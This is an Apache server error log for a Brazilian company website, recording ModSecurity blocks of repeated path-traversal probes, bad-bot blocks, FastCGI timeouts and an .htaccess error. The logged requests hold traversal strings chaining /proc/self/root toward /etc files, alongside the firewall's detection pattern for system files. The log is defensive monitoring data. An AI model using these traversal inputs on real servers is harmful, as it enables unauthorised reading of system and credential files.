[Wed Mar 18 03:07:09.286336 2026] [:error] [pid 19507:tid 140411565680384] [client 74.7.243.128:54358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpBDdY0UrI5A3LftIxJbAAAAZU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:07:30.129818 2026] [proxy_fcgi:error] [pid 19507:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35542] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:07:52.069844 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:35834] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:07:53.983626 2026] [:error] [pid 15826:tid 140411649607424] [client 74.7.243.128:46830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpBOeoXxyEfFpUF8f8moAAAAUs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:08:14.427644 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36122] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:08:24.230351 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:39396] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpBWOoXxyEfFpUF8f8mxQAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:08:37.125847 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36440] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:08:59.088252 2026] [proxy_fcgi:error] [pid 17653:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:09:21.149835 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:36934] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:09:48.069971 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37234] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:09:50.616388 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:40010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpBrgkwaGbbGflqUZDNGAAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:10:10.033858 2026] [proxy_fcgi:error] [pid 19507:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:37478] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:10:31.122411 2026] [proxy_fcgi:error] [pid 17653:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:37724] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:10:38.565609 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:43536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpB3uoXxyEfFpUF8f8m9AAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:10:54.133825 2026] [proxy_fcgi:error] [pid 17653:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:38006] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:11:16.121564 2026] [proxy_fcgi:error] [pid 17887:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38284] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:11:38.045875 2026] [proxy_fcgi:error] [pid 19507:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38600] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:11:39.255367 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.244.43:48370] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpCG9a6ubjKNq_cu4ZPVQAAA1U"]
[Wed Mar 18 03:11:51.072815 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.228.61:51862] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpCJ-oXxyEfFpUF8f8nAQAAAUQ"]
[Wed Mar 18 03:12:00.129987 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38940] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:12:22.133832 2026] [proxy_fcgi:error] [pid 19507:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39264] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:12:44.049741 2026] [proxy_fcgi:error] [pid 31803:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39558] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:13:06.133788 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39798] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:13:28.133869 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:40122] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:13:37.337070 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:33192] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpCkew_le52K8_3pV2aCwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:13:49.137299 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:14:11.130627 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40674] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:14:20.684115 2026] [mime_magic:error] [pid 31803:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:53058] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/firmware
[Wed Mar 18 03:14:33.126262 2026] [proxy_fcgi:error] [pid 26799:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40868] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:14:55.133826 2026] [proxy_fcgi:error] [pid 11816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:41046] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:15:17.144830 2026] [proxy_fcgi:error] [pid 11816:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:41318] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:15:39.131350 2026] [proxy_fcgi:error] [pid 15826:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41488] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:15:49.677607 2026] [:error] [pid 30077:tid 140411716749056] [client 216.73.216.191:7931] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpDFfu8EFLIOrSqIpvBjQAAAkM"]
[Wed Mar 18 03:16:03.081805 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41732] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:16:25.149831 2026] [proxy_fcgi:error] [pid 15826:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41948] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:16:27.876903 2026] [:error] [pid 17887:tid 140411590858496] [client 216.73.216.191:30400] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpDOwkwaGbbGflqUZDNsQAAANI"]
[Wed Mar 18 03:16:33.675128 2026] [:error] [pid 11816:tid 140411683178240] [client 216.73.216.191:48988] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpDQew_le52K8_3pV2aQAAAAgc"]
[Wed Mar 18 03:16:40.511025 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.244.43:33482] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpDSAkwaGbbGflqUZDNtAAAAME"]
[Wed Mar 18 03:16:49.125862 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42256] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:16:53.382612 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.228.61:34058] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpDVeyqAr6etmhZHNpybgAAAE0"]
[Wed Mar 18 03:17:12.157362 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:42492] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:17:34.125268 2026] [proxy_fcgi:error] [pid 15826:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:42762] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:17:56.125815 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:18:18.125800 2026] [proxy_fcgi:error] [pid 15826:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43308] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:18:39.141818 2026] [proxy_fcgi:error] [pid 15051:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:43632] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:19:01.118346 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:43964] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:19:24.133822 2026] [proxy_fcgi:error] [pid 15051:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44290] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:19:46.133805 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:44620] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:19:55.169856 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:51914] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpEC-oXxyEfFpUF8f8nswAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:20:08.110030 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:44938] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:20:08.759671 2026] [:error] [pid 26799:tid 140411674785536] [client 216.73.216.191:50244] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpEGNa6ubjKNq_cu4ZP6QAAA0g"]
[Wed Mar 18 03:20:29.122411 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45198] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:20:51.057971 2026] [proxy_fcgi:error] [pid 29882:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45398] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:21:14.125793 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:45660] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:21:36.118947 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:45934] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:21:41.578828 2026] [:error] [pid 11816:tid 140411557287680] [client 74.7.244.43:35746] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpEdew_le52K8_3pV2a2gAAAhY"]
[Wed Mar 18 03:21:53.636290 2026] [:error] [pid 15051:tid 140411733534464] [client 74.7.228.61:45920] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpEgSmAPhZkrhU8w4kpFgAAAIE"]
[Wed Mar 18 03:21:58.129790 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:46240] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:22:21.084041 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46484] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:22:33.631832 2026] [mime_magic:error] [pid 11816:tid 140411599251200] (70014)End of file found: [client 74.7.241.31:49324] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/systemd/generator
[Wed Mar 18 03:22:43.082879 2026] [proxy_fcgi:error] [pid 29882:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46730] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:23:04.121834 2026] [proxy_fcgi:error] [pid 11816:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:46924] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:23:29.137775 2026] [proxy_fcgi:error] [pid 15051:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:47294] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:23:51.072990 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:47576] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:23:53.075916 2026] [core:alert] [pid 15826:tid 140411616036608] [client 74.7.243.128:38270] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/firmware
[Wed Mar 18 03:24:02.687491 2026] [:error] [pid 29882:tid 140411582465792] [client 74.7.241.31:40260] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpFAkzinOy1jxa1j4fM5gAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Wed Mar 18 03:24:14.057834 2026] [proxy_fcgi:error] [pid 11816:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47846] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:24:37.125834 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:48120] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:24:45.363169 2026] [access_compat:error] [pid 29882:tid 140411658000128] [client 216.73.216.191:47548] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/goods.php
[Wed Mar 18 03:24:59.137816 2026] [proxy_fcgi:error] [pid 17887:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:48442] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 03:25:20.137815 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48668] AH01075: Error dispatching request to : (polling)
